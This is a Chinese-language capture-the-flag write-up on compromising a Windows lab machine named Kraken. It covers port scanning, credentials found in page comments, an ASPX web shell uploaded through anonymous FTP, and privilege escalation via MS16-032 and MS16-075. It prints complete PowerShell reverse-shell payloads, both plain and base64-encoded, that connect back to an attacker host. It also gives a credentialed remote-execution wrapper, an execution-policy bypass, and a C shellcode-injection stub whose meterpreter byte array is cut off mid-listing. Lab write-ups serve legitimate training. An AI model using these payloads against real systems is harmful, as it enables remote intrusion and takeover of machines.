Fatec Ourinhos CTF 2018——Writeup
摘要:
介紹
本文是一篇關於 Fatec Ourinhos CTF 2018 第 2 版挑戰賽的 write-up ,我將詳細的闡述如何拿到 Kraken 這臺機器 flag 。
機器的原名是 Kraken ,是我在 2017 年為我的團隊 WATCHERS 搭建的個人滲透測試實驗室的一...
介紹
本文是一篇關於 Fatec Ourinhos CTF 2018 第 2 版挑戰賽的 write-up ,我將詳細的闡述如何拿到 Kraken 這臺機器 flag 。
機器的原名是 Kraken ,是我在 2017 年為我的團隊 WATCHERS 搭建的個人滲透測試實驗室的一部分。
挑戰資訊
· 名稱: Unleash the Kraken
· 我們的目標 IP 地址是 192.168.56.100 ,域名是 kraken.wtc 。
· 作業系統: Windows
列舉掃描階段
Nmap 向我們顯示了以下輸出內容:
[root:~] nmap 192.168.56.100 -Pn -sT Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-16 14:22 PDT Nmap scan report for 192.168.56.100 Host is up, received user-set (0.10s latency). Not shown: 990 filtered ports Reason: 990 no-responses Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORTSTATE SERVICEREASON 21/tcpopenftpsyn-ack 80/tcpopenhttpsyn-ack 135/tcpopenmsrpcsyn-ack 443/tcpopenhttpssyn-ack 1723/tcpopenpptpsyn-ack 3389/tcpopenms-wbt-server syn-ack 49153/tcp openunknownsyn-ack 49154/tcp openunknownsyn-ack 49156/tcp openunknownsyn-ack 49157/tcp openunknownsyn-ack Nmap done: 1 IP address (1 host up) scanned in 10.73 seconds
很明顯,我們有一個網站和一個 FTP 伺服器需要滲透測試。其他的服務都需要憑證,但我們沒有憑證資訊。
這個網站的頁面是一張 “ 海妖 (kraken)” 的圖片,如下圖所示:
讓我們啟動一個 cURL 請求 http 的服務埠,看看我們能得到了什麼資訊:
[root:~] curl http://192.168.56.100 <html> <body> <div align="center"> <h1>Release the kraken!</h1> <img src="kraken-pic.jpg"/> </div> <!-- Username: DavyJones --> <!-- Password: #kr4kud0o0O --> </body> </html>
從網頁原始碼中我們拿到了憑證。嘗試登陸 FTP (埠 21 )服務並沒有成功,嘗試登入 RDP (埠 3389 )服務同樣失敗了!
現在,我嘗試通過匿名賬戶 (anonymous) 登入 FTP 竟然成功了!
[root:~] ftp 192.168.56.100 Connected to 192.168.56.100. 220 Microsoft FTP Service Name (192.168.56.100:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230-Directory has 49,359,065,088 bytes of disk space available. 230 User logged in. Remote system type is Windows_NT. ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 05-17-201801:08PM<DIR>kraken 05-17-201802:01PM<DIR>uploads 05-17-201801:08PM<DIR>App_Data 05-17-201811:26AM189 index.html 05-17-201811:21AM53404 kraken-pic.jpg 226-Directory has 49,359,065,088 bytes of disk space available. 226 Transfer complete. ftp>
我們可以通過 FTP 的匿名賬戶訪問到 Web 根目錄,讓我們嘗試上傳檔案。
[root:/tmp] echo 'andre' >> file.txt [root:/tmp] ftp 192.168.56.100 Connected to 192.168.56.100. 220 Microsoft FTP Service Name (192.168.56.100:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230-Directory has 49,354,731,520 bytes of disk space available. 230 User logged in. Remote system type is Windows_NT. ftp> put file.txt local: file.txt remote: file.txt 200 PORT command successful. 550 Access is denied. ftp>
我們沒有許可權上傳檔案。但也許另一個資料夾可以? uploads 這個資料夾本身就是接收檔案的,應該是有許可權的!
ftp> cd uploads 250 CWD command successful. ftp> put file.txt local: file.txt remote: file.txt 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 7 bytes sent in 0.00 secs (175.2805 kB/s) ftp> exit 221 Goodbye. [root:/tmp] curl http://192.168.56.100/uploads/file.txt andre [root:/tmp]
漏洞利用
現在我們知道了一種上傳任意檔案的方法,並且我們可以使用瀏覽器訪問上傳的檔案。那麼,現在就只是上傳個 Web shell 的問題了,因此我們可以在 Kraken 主機上獲得一個 shell 。
[root:/tmp] cp /usr/share/webshells/aspx/cmdasp.aspx . [root:/tmp] ftp 192.168.56.100 Connected to 192.168.56.100. 220 Microsoft FTP Service Name (192.168.56.100:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230-Directory has 49,345,097,728 bytes of disk space available. 230 User logged in. Remote system type is Windows_NT. ftp> cd uploads 250 CWD command successful. ftp> put cmdasp.aspx local: cmdasp.aspx remote: cmdasp.aspx 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 1442 bytes sent in 0.00 secs (42.9749 MB/s)
現在使用 Web 瀏覽器訪問 Webshell 併發送命令!
拿到主機許可權
為了獲得一個 shell ,我使用了我編寫的反向 shell 生成器工具 Shellpop" target="_blank" rel="nofollow,noindex"> shellpop 來幫助我拿到主機的系統 shell ,如下所示:
[root:/tmp] shellpop --payload windows/reverse/tcp/powershell -H tun0 -P 443 [+] Execute this code in remote target: powershell.exe -nop -ep bypass -Command "$cFYlLK='10.11.12.26';$BfKleTWqoeSd=443;$czOaNBi=New-Object System.Net.Sockets.TCPClient($cFYlLK,$BfKleTWqoeSd);$QHFXyM=$czOaNBi.GetStream();[byte[]]$xdjeYJjrFCJTTT=0..65535|%{0};$tBoRkCjv=([text.encoding]::ASCII).GetBytes('PS '+(Get-Location).Path+'> ');$QHFXyM.Write($tBoRkCjv,0,$tBoRkCjv.Length);while(($LOlZmTcyLFlYNih=$QHFXyM.Read($xdjeYJjrFCJTTT,0,$xdjeYJjrFCJTTT.Length)) -ne 0){$qLUSJN=([text.encoding]::ASCII).GetString($xdjeYJjrFCJTTT,0,$LOlZmTcyLFlYNih);try{$yWMBwfso=(Invoke-Expression -c $qLUSJN 2>&1|Out-String)}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$cFYlLK0=$yWMBwfso+'PS '+(Get-Location).Path+'> ';$cFYlLK1=($cFYlLK2[0]|Out-String);$cFYlLK2.clear();$cFYlLK0=$cFYlLK0+$cFYlLK1;$tBoRkCjv=([text.encoding]::ASCII).GetBytes($cFYlLK0);$QHFXyM.Write($tBoRkCjv,0,$tBoRkCjv.Length);$QHFXyM.Flush();};$czOaNBi.Close();if($cFYlLK3){$cFYlLK3.Stop();};" [+] This shell DOES NOT have a handler set. [root:/tmp]# nc -lvp 443 Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Listening on :::443 Ncat: Listening on 0.0.0.0:443 Ncat: Connection from 192.168.56.100. Ncat: Connection from 192.168.56.100:49244. PS C:\windows\system32\inetsrv>
現在我們已經拿到了系統 shell 的許可權。在此計算機中有多種方法可以拿到 SYSTEM 許可權,但這適用於許可權提升階段。
特權提升
如果你在系統資訊列舉階段多花一點時間,你很快就會發現這臺機器缺少很多補丁程式。
PS C:\windows\system32\inetsrv> Get-Hotfix | Where-Object { $_.Description -eq "Security Update" }
SourceDescriptionHotFixIDInstalledByInstalledOn
-----------------------------------------------
KRAKENSecurity UpdateKB24799436/15/2015 ...
KRAKENSecurity UpdateKB24916836/15/2015 ...
KRAKENSecurity UpdateKB25062126/15/2015 ...
KRAKENSecurity UpdateKB25095536/15/2015 ...
KRAKENSecurity UpdateKB25114556/15/2015 ...
KRAKENSecurity UpdateKB25258356/15/2015 ...
KRAKENSecurity UpdateKB25362756/15/2015 ...
KRAKENSecurity UpdateKB25362766/15/2015 ...
KRAKENSecurity UpdateKB25448936/15/2015 ...
KRAKENSecurity UpdateKB25606566/15/2015 ...
KRAKENSecurity UpdateKB25649586/15/2015 ...
KRAKENSecurity UpdateKB25709476/15/2015 ...
KRAKENSecurity UpdateKB25855426/15/2015 ...
KRAKENSecurity UpdateKB26041156/15/2015 ...
KRAKENSecurity UpdateKB26207046/15/2015 ...
KRAKENSecurity UpdateKB26214406/15/2015 ...
KRAKENSecurity UpdateKB26318136/15/2015 ...
KRAKENSecurity UpdateKB26437196/15/2015 ...
KRAKENSecurity UpdateKB26544286/15/2015 ...
KRAKENSecurity UpdateKB26674026/15/2015 ...
KRAKENSecurity UpdateKB26765626/15/2015 ...
KRAKENSecurity UpdateKB26905336/15/2015 ...
KRAKENSecurity UpdateKB26983656/15/2015 ...
KRAKENSecurity UpdateKB27052196/15/2015 ...
KRAKENSecurity UpdateKB27128086/15/2015 ...
KRAKENSecurity UpdateKB27275286/15/2015 ...
KRAKENSecurity UpdateKB27364226/15/2015 ...
KRAKENSecurity UpdateKB27425996/15/2015 ...
KRAKENSecurity UpdateKB2765809KRAKEN\Administrator 6/15/2015 ...
KRAKENSecurity UpdateKB27706606/15/2015 ...
KRAKENSecurity UpdateKB28079866/15/2015 ...
KRAKENSecurity UpdateKB28133476/15/2015 ...
KRAKENSecurity UpdateKB28134306/15/2015 ...
KRAKENSecurity UpdateKB28324146/15/2015 ...
KRAKENSecurity UpdateKB28353616/15/2015 ...
KRAKENSecurity UpdateKB28398946/15/2015 ...
KRAKENSecurity UpdateKB28406316/15/2015 ...
KRAKENSecurity UpdateKB28479276/15/2015 ...
KRAKENSecurity UpdateKB28611916/15/2015 ...
KRAKENSecurity UpdateKB28616986/15/2015 ...
KRAKENSecurity UpdateKB28621526/15/2015 ...
KRAKENSecurity UpdateKB28623306/15/2015 ...
KRAKENSecurity UpdateKB28623356/15/2015 ...
KRAKENSecurity UpdateKB28629736/15/2015 ...
KRAKENSecurity UpdateKB28640586/15/2015 ...
KRAKENSecurity UpdateKB28642026/15/2015 ...
KRAKENSecurity UpdateKB28680386/15/2015 ...
KRAKENSecurity UpdateKB28719976/15/2015 ...
KRAKENSecurity UpdateKB28723396/15/2015 ...
KRAKENSecurity UpdateKB28842566/15/2015 ...
KRAKENSecurity UpdateKB28870696/15/2015 ...
KRAKENSecurity UpdateKB28920746/15/2015 ...
KRAKENSecurity UpdateKB28932946/15/2015 ...
KRAKENSecurity UpdateKB28948446/15/2015 ...
KRAKENSecurity UpdateKB28988516/15/2015 ...
KRAKENSecurity UpdateKB29009866/15/2015 ...
KRAKENSecurity UpdateKB29115016/15/2015 ...
KRAKENSecurity UpdateKB29123906/15/2015 ...
KRAKENSecurity UpdateKB29186146/15/2015 ...
KRAKENSecurity UpdateKB29222296/15/2015 ...
KRAKENSecurity UpdateKB29233926/15/2015 ...
KRAKENSecurity UpdateKB29313566/15/2015 ...
KRAKENSecurity UpdateKB29376106/15/2015 ...
KRAKENSecurity UpdateKB29395766/15/2015 ...
KRAKENSecurity UpdateKB29433576/15/2015 ...
KRAKENSecurity UpdateKB29571896/15/2015 ...
KRAKENSecurity UpdateKB29575036/15/2015 ...
KRAKENSecurity UpdateKB29575096/15/2015 ...
KRAKENSecurity UpdateKB29610726/15/2015 ...
KRAKENSecurity UpdateKB29682946/15/2015 ...
KRAKENSecurity UpdateKB29718506/15/2015 ...
KRAKENSecurity UpdateKB29721006/15/2015 ...
KRAKENSecurity UpdateKB29722116/15/2015 ...
KRAKENSecurity UpdateKB29722806/15/2015 ...
KRAKENSecurity UpdateKB29731126/15/2015 ...
KRAKENSecurity UpdateKB29732016/15/2015 ...
KRAKENSecurity UpdateKB29733516/15/2015 ...
KRAKENSecurity UpdateKB29766276/15/2015 ...
KRAKENSecurity UpdateKB29768976/15/2015 ...
KRAKENSecurity UpdateKB29772926/15/2015 ...
KRAKENSecurity UpdateKB29781206/15/2015 ...
KRAKENSecurity UpdateKB29786686/15/2015 ...
KRAKENSecurity UpdateKB29795706/15/2015 ...
KRAKENSecurity UpdateKB29849726/15/2015 ...
KRAKENSecurity UpdateKB29919636/15/2015 ...
KRAKENSecurity UpdateKB29926116/15/2015 ...
KRAKENSecurity UpdateKB29939586/15/2015 ...
KRAKENSecurity UpdateKB3002657KRAKEN\Administrator 6/15/2015 ...
KRAKENSecurity UpdateKB30037436/15/2015 ...
KRAKENSecurity UpdateKB30043616/15/2015 ...
KRAKENSecurity UpdateKB30043756/15/2015 ...
KRAKENSecurity UpdateKB30089236/15/2015 ...
KRAKENSecurity UpdateKB30107886/15/2015 ...
KRAKENSecurity UpdateKB30117806/15/2015 ...
KRAKENSecurity UpdateKB3014029KRAKEN\Administrator 6/15/2015 ...
KRAKENSecurity UpdateKB30192156/15/2015 ...
KRAKENSecurity UpdateKB30203886/15/2015 ...
KRAKENSecurity UpdateKB30216746/15/2015 ...
KRAKENSecurity UpdateKB30219526/15/2015 ...
KRAKENSecurity UpdateKB30227776/15/2015 ...
KRAKENSecurity UpdateKB30232156/15/2015 ...
KRAKENSecurity UpdateKB30303776/15/2015 ...
KRAKENSecurity UpdateKB30323236/15/2015 ...
KRAKENSecurity UpdateKB30323596/15/2015 ...
KRAKENSecurity UpdateKB30326556/15/2015 ...
KRAKENSecurity UpdateKB30338896/15/2015 ...
KRAKENSecurity UpdateKB30339296/15/2015 ...
KRAKENSecurity UpdateKB30343446/15/2015 ...
KRAKENSecurity UpdateKB30351266/15/2015 ...
KRAKENSecurity UpdateKB30351326/15/2015 ...
KRAKENSecurity UpdateKB30375746/15/2015 ...
KRAKENSecurity UpdateKB30390666/15/2015 ...
KRAKENSecurity UpdateKB30425536/15/2015 ...
KRAKENSecurity UpdateKB30451716/15/2015 ...
KRAKENSecurity UpdateKB30456856/15/2015 ...
KRAKENSecurity UpdateKB30459996/15/2015 ...
KRAKENSecurity UpdateKB30460026/15/2015 ...
KRAKENSecurity UpdateKB30460496/15/2015 ...
KRAKENSecurity UpdateKB30462696/15/2015 ...
KRAKENSecurity UpdateKB30463066/15/2015 ...
KRAKENSecurity UpdateKB30464826/15/2015 ...
KRAKENSecurity UpdateKB30480706/15/2015 ...
KRAKENSecurity UpdateKB30495636/15/2015 ...
KRAKENSecurity UpdateKB30517686/15/2015 ...
KRAKENSecurity UpdateKB30556426/15/2015 ...
KRAKENSecurity UpdateKB30578396/15/2015 ...
KRAKENSecurity UpdateKB30585156/15/2015 ...
KRAKENSecurity UpdateKB30593176/15/2015 ...
KRAKENSecurity UpdateKB30615186/15/2015 ...
KRAKENSecurity UpdateKB30638586/15/2015 ...
PS C:\windows\system32\inetsrv>
它的最後一個修補程式是 KB 3063858 !多麼老的補丁程式了。現在我們可以使用多個 Exp 將許可權提升到 SYSTEM 。如:
· MS16-032
· MS16-075
這兩個 Exp 都可以使用,並證明都可以成功提權。接下來,我將詳細介紹如何利用每一個 Exp 進行提權。
MS16-032
此漏洞發生在多核(重要細節) Windows 計算機中的競爭條件,允許攻擊者獲得 SYSTEM 許可權。
你可以在 這裡 獲取到這個 Exp 的 powershell 版本。
還有一個細節要注意,我們不能在 Session 0 中使用這個 Exp 。什麼是 session 0 ?你可以在此 連結中獲得 有關 session0 的更多資訊。
在瞭解了 Session 0 之後,你需要明白我們必須要在 Windows 中使用互動式會話來利用此漏洞。
我們可以通過遠端桌面來實現互動式會話,這臺主機開放了 3389 ,但我們無法使用我們在之前的網頁中找到的憑證登入 3389 。
那麼讓我們列一下伺服器上的使用者吧。
所以有兩個使用者, DavyJones (我們知道密碼)和 JackSparrow (我們不知道密碼)。我們現在檢視一下這兩個使用者的使用者組。
DavyJones 是一個普通的使用者。看起來不是那麼酷。那 JackSparrow 怎麼樣呢?
現在我們知道 JackSparrow 使用者具有登入遠端桌面的許可權,如果通過這個帳戶登入 3389 ,我們就可以使用 MS16-032 提權到 SYSTEM ,讓我們嘗試使用 DavyJones 使用者的憑證並使用 PowerShell 瀏覽 DavyJones 使用者的檔案。
使用以下 PowerShell 命令,我們就可以通過 Web shell 以 DavyJones 使用者的身份執行命令:
powershell -nop -ep bypass -command $u='KRAKEN\DavyJones';$p='#kr4kud0o0O';$c=convertTo-SecureString -AsPlainText -Force $p;$c=new-object system.management.automation.pscredential($u,$c);Invoke-Command -ComputerName 127.0.0.1 -Credential $c -ScriptBlock { whoami}
現在,我們可以嘗試獲取 DavyJones 這個使用者的反向 shell ,使用 Shellpop 我們很容易就搞定了。
要使用我的工具生成乾淨的反向 tcp powershell 命令,可以使用下面的語句:
[root:/tmp] shellpop --payload windows/reverse/tcp/powershell -H tun0 -P 443 --base64 [+] Execute this code in remote target: powershell.exe -nop -ep bypass -Encoded JABLAFUAVwB1AEsASgB1AD0AJwAxADAALgAxADEALgAxADIALgAxADQAJwA7ACQATgBuAGkASgBjAHUAWABqAE8AegBMAG0APQA0ADQAMwA7ACQASQBDAGEAQQB3AEYATwBkAEQAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACQASwBVAFcAdQBLAEoAdQAsACQATgBuAGkASgBjAHUAWABqAE8AegBMAG0AKQA7ACQARwBFAGsAWgBrAFYAVABYAFQAUwB5AEgAPQAkAEkAQwBhAEEAdwBGAE8AZABEAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYQBPAFUATgBRAFoAWgByAFkAcABEAD0AMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7ACQAdgBPAGQAZQBoAGYATwBVAHYAcgBaAEoAPQAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACcAUABTACAAJwArACgARwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AKQAuAFAAYQB0AGgAKwAnAD4AIAAnACkAOwAkAEcARQBrAFoAawBWAFQAWABUAFMAeQBIAC4AVwByAGkAdABlACgAJAB2AE8AZABlAGgAZgBPAFUAdgByAFoASgAsADAALAAkAHYATwBkAGUAaABmAE8AVQB2AHIAWgBKAC4ATABlAG4AZwB0AGgAKQA7AHcAaABpAGwAZQAoACgAJABiAGcATgBSAG8AVwA9ACQARwBFAGsAWgBrAFYAVABYAFQAUwB5AEgALgBSAGUAYQBkACgAJABhAE8AVQBOAFEAWgBaAHIAWQBwAEQALAAwACwAJABhAE8AVQBOAFEAWgBaAHIAWQBwAEQALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ACQAeABxAEQAcwBLAHYAagB0AHAAZwBpAFAARAA9ACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGEATwBVAE4AUQBaAFoAcgBZAHAARAAsADAALAAkAGIAZwBOAFIAbwBXACkAOwB0AHIAeQB7ACQARABZAE8ATgByAEYARgBPAD0AKABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAIAAkAHgAcQBEAHMASwB2AGoAdABwAGcAaQBQAEQAIAAyAD4AJgAxAHwATwB1AHQALQBTAHQAcgBpAG4AZwApAH0AYwBhAHQAYwBoAHsAVwByAGkAdABlAC0AVwBhAHIAbgBpAG4AZwAgACcAUwBvAG0AZQB0AGgAaQBuAGcAIAB3AGUAbgB0ACAAdwByAG8AbgBnACAAdwBpAHQAaAAgAGUAeABlAGMAdQB0AGkAbwBuACAAbwBmACAAYwBvAG0AbQBhAG4AZAAgAG8AbgAgAHQAaABlACAAdABhAHIAZwBlAHQALgAnADsAVwByAGkAdABlAC0ARQByAHIAbwByACAAJABfADsAfQA7ACQASwBVAFcAdQBLAEoAdQAwAD0AJABEAFkATwBOAHIARgBGAE8AKwAnAFAAUwAgACcAKwAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACkALgBQAGEAdABoACsAJwA+ACAAJwA7ACQASwBVAFcAdQBLAEoAdQAxAD0AKAAkAEsAVQBXAHUASwBKAHUAMgBbADAAXQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA7ACQASwBVAFcAdQBLAEoAdQAyAC4AYwBsAGUAYQByACgAKQA7ACQASwBVAFcAdQBLAEoAdQAwAD0AJABLAFUAVwB1AEsASgB1ADAAKwAkAEsAVQBXAHUASwBKAHUAMQA7ACQAdgBPAGQAZQBoAGYATwBVAHYAcgBaAEoAPQAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQASwBVAFcAdQBLAEoAdQAwACkAOwAkAEcARQBrAFoAawBWAFQAWABUAFMAeQBIAC4AVwByAGkAdABlACgAJAB2AE8AZABlAGgAZgBPAFUAdgByAFoASgAsADAALAAkAHYATwBkAGUAaABmAE8AVQB2AHIAWgBKAC4ATABlAG4AZwB0AGgAKQA7ACQARwBFAGsAWgBrAFYAVABYAFQAUwB5AEgALgBGAGwAdQBzAGgAKAApADsAfQA7ACQASQBDAGEAQQB3AEYATwBkAEQALgBDAGwAbwBzAGUAKAApADsAaQBmACgAJABLAFUAVwB1AEsASgB1ADMAKQB7ACQASwBVAFcAdQBLAEoAdQAzAC4AUwB0AG8AcAAoACkAOwB9ADsAIAA= [+] This shell DOES NOT have a handler set.
我們最終需要在 webshell 上執行的命令為:
powershell -nop -ep bypass -command $u='KRAKEN\DavyJones';$p='#kr4kud0o0O';$c=convertTo-SecureString -AsPlainText -Force $p;$c=new-object system.management.automation.pscredential($u,$c);Invoke-Command -ComputerName 127.0.0.1 -Credential $c -ScriptBlock { powershell.exe -nop -ep bypass -Encoded JABLAFUAVwB1AEsASgB1AD0AJwAxADAALgAxADEALgAxADIALgAxADQAJwA7ACQATgBuAGkASgBjAHUAWABqAE8AegBMAG0APQA0ADQAMwA7ACQASQBDAGEAQQB3AEYATwBkAEQAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACQASwBVAFcAdQBLAEoAdQAsACQATgBuAGkASgBjAHUAWABqAE8AegBMAG0AKQA7ACQARwBFAGsAWgBrAFYAVABYAFQAUwB5AEgAPQAkAEkAQwBhAEEAdwBGAE8AZABEAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYQBPAFUATgBRAFoAWgByAFkAcABEAD0AMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7ACQAdgBPAGQAZQBoAGYATwBVAHYAcgBaAEoAPQAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACcAUABTACAAJwArACgARwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AKQAuAFAAYQB0AGgAKwAnAD4AIAAnACkAOwAkAEcARQBrAFoAawBWAFQAWABUAFMAeQBIAC4AVwByAGkAdABlACgAJAB2AE8AZABlAGgAZgBPAFUAdgByAFoASgAsADAALAAkAHYATwBkAGUAaABmAE8AVQB2AHIAWgBKAC4ATABlAG4AZwB0AGgAKQA7AHcAaABpAGwAZQAoACgAJABiAGcATgBSAG8AVwA9ACQARwBFAGsAWgBrAFYAVABYAFQAUwB5AEgALgBSAGUAYQBkACgAJABhAE8AVQBOAFEAWgBaAHIAWQBwAEQALAAwACwAJABhAE8AVQBOAFEAWgBaAHIAWQBwAEQALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ACQAeABxAEQAcwBLAHYAagB0AHAAZwBpAFAARAA9ACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGEATwBVAE4AUQBaAFoAcgBZAHAARAAsADAALAAkAGIAZwBOAFIAbwBXACkAOwB0AHIAeQB7ACQARABZAE8ATgByAEYARgBPAD0AKABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAIAAkAHgAcQBEAHMASwB2AGoAdABwAGcAaQBQAEQAIAAyAD4AJgAxAHwATwB1AHQALQBTAHQAcgBpAG4AZwApAH0AYwBhAHQAYwBoAHsAVwByAGkAdABlAC0AVwBhAHIAbgBpAG4AZwAgACcAUwBvAG0AZQB0AGgAaQBuAGcAIAB3AGUAbgB0ACAAdwByAG8AbgBnACAAdwBpAHQAaAAgAGUAeABlAGMAdQB0AGkAbwBuACAAbwBmACAAYwBvAG0AbQBhAG4AZAAgAG8AbgAgAHQAaABlACAAdABhAHIAZwBlAHQALgAnADsAVwByAGkAdABlAC0ARQByAHIAbwByACAAJABfADsAfQA7ACQASwBVAFcAdQBLAEoAdQAwAD0AJABEAFkATwBOAHIARgBGAE8AKwAnAFAAUwAgACcAKwAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACkALgBQAGEAdABoACsAJwA+ACAAJwA7ACQASwBVAFcAdQBLAEoAdQAxAD0AKAAkAEsAVQBXAHUASwBKAHUAMgBbADAAXQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA7ACQASwBVAFcAdQBLAEoAdQAyAC4AYwBsAGUAYQByACgAKQA7ACQASwBVAFcAdQBLAEoAdQAwAD0AJABLAFUAVwB1AEsASgB1ADAAKwAkAEsAVQBXAHUASwBKAHUAMQA7ACQAdgBPAGQAZQBoAGYATwBVAHYAcgBaAEoAPQAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQASwBVAFcAdQBLAEoAdQAwACkAOwAkAEcARQBrAFoAawBWAFQAWABUAFMAeQBIAC4AVwByAGkAdABlACgAJAB2AE8AZABlAGgAZgBPAFUAdgByAFoASgAsADAALAAkAHYATwBkAGUAaABmAE8AVQB2AHIAWgBKAC4ATABlAG4AZwB0AGgAKQA7ACQARwBFAGsAWgBrAFYAVABYAFQAUwB5AEgALgBGAGwAdQBzAGgAKAApADsAfQA7ACQASQBDAGEAQQB3AEYATwBkAEQALgBDAGwAbwBzAGUAKAApADsAaQBmACgAJABLAFUAVwB1AEsASgB1ADMAKQB7ACQASwBVAFcAdQBLAEoAdQAzAC4AUwB0AG8AcAAoACkAOwB9ADsAIAA=}
然後我們就獲得了 DavyJones 使用者的反向 shell !
我們很快就從 davy jones 的文件資料夾中找到了文字檔案中儲存的 Jack Sparrow 密碼。
使用以下命令可以訪問 RDP 並獲得互動式會話!
[root:/tmp] rdesktop -u 'JackSparrow' -p 'sp4rr0w_rul3z' 192.168.56.100
使用 RDP 登入後,下一步是下載漏洞利用指令碼,但很快我們就會發現指令碼的執行被禁用了,請參見下圖。
要繞過此限制,我們可以使用以下 PowerShell 命令:
Set-ExecutionPolicy -Scope CurrentUser Bypass
禁用此功能後,我們可以執行指令碼並將我們的許可權提升到 SYSTEM !
MS16-075
這個漏洞存在於一個 Windows 服務帳戶中,該賬戶具有 SeImpersonatePrvilege 特權,並能夠觸發 Windows NT 核心中會洩漏 SYSTEM 令牌的 Bug ,並且由於我們的使用者有 SeImpersonatePrivilege 特權,所以我們能夠嗅探令牌並模仿我們自己的 SYSTEM ,然後進行特權提升。
Windows IIS 和 SQL 伺服器具有此類許可權的服務帳戶,因此如果我們有 IIS 或 SQL 伺服器的 shell 並且伺服器缺少 MS16-075 補丁程式,那麼我們就可以利用這個 Exp 。
為了利用這個漏洞,我使用了 Rotten Potato 這個工具。我們需要一個 MSF 的 meterpreter 會話。為此,我選擇使用自定義 C 程式碼將 shellcode 注入遠端程序。
int main()
{
SIZE_T szShellcode = 476;
BYTE shellcode[] = {
0xbd,0x82,0xcd,0xe3,0x7c,0xdb,0xda,0xd9,0x74,0x24,0xf4,0x58,0x31,0xc9,0xb1,
0x71,0x83,0xe8,0xfc,0x31,0x68,0x0f,0x03,0x68,0x8d,0x2f,0x16,0x80,0xd9,0x2c,
0x3d,0x89,0x31,0xfe,0xbe,0x6a,0xc1,0xbe,0xef,0x2b,0x91,0x12,0x41,0xfa,0x59,
0xa2,0xb3,0x67,0x11,0x4f,0x61,0x08,0xe9,0xc4,0xd4,0xd0,0xa1,0x51,0x8a,0xc0,
0x79,0xed,0x59,0x51,0x31,0xfe,0x2a,0x1b,0x8b,0x4d,0x64,0x55,0x43,0x7f,0x46,
0xc9,0x6f,0x1e,0x3a,0x10,0xa3,0xc0,0x83,0xd5,0x72,0x0d,0x45,0xd7,0x45,0xec,
0xa8,0x85,0x04,0xa0,0x7a,0xa1,0xd4,0x62,0xf0,0xf7,0xe4,0x2a,0x07,0x28,0x72,
0x2a,0x7f,0xd0,0x71,0x2e,0x8f,0x65,0xf7,0x2e,0x8f,0x65,0x7c,0xae,0x07,0x65,
0x82,0xaf,0x5f,0xe3,0x42,0xdb,0x38,0xa3,0x43,0xf4,0x97,0xb8,0x0b,0xec,0x53,
0x34,0xcb,0x2c,0x15,0x4b,0x1b,0xcf,0xf3,0x03,0x64,0xd9,0xbd,0x18,0xae,0x52,
0x75,0x1e,0x18,0x2f,0xb7,0xe9,0xec,0x81,0x77,0x45,0xad,0x20,0xbe,0x9b,0x6c,
0xa2,0x80,0x9c,0x8e,0xd1,0xf3,0x91,0x4d,0x56,0xd0,0x21,0x14,0x5f,0xc9,0x47,
0x4e,0xc7,0xad,0x2c,0x2e,0xdc,0x64,0x32,0x7e,0x7a,0x36,0xbf,0x72,0xcb,0xfc,
0x34,0xca,0xd7,0xb5,0x4b,0x1a,0xa6,0xce,0x48,0x12,0x61,0xd0,0x80,0x63,0x2a,
0x93,0x78,0x3d,0x93,0x49,0x38,0x99,0x62,0x37,0xfb,0x43,0x2d,0x44,0x17,0x53,
0xec,0x18,0x17,0x73,0xb6,0xdd,0xbe,0x29,0x0f,0x55,0x52,0x24,0xc4,0x96,0xac,
0x49,0x86,0x21,0xed,0xc2,0x4a,0x80,0x4e,0x1f,0x9f,0xe4,0x70,0x1e,0x89,0xad,
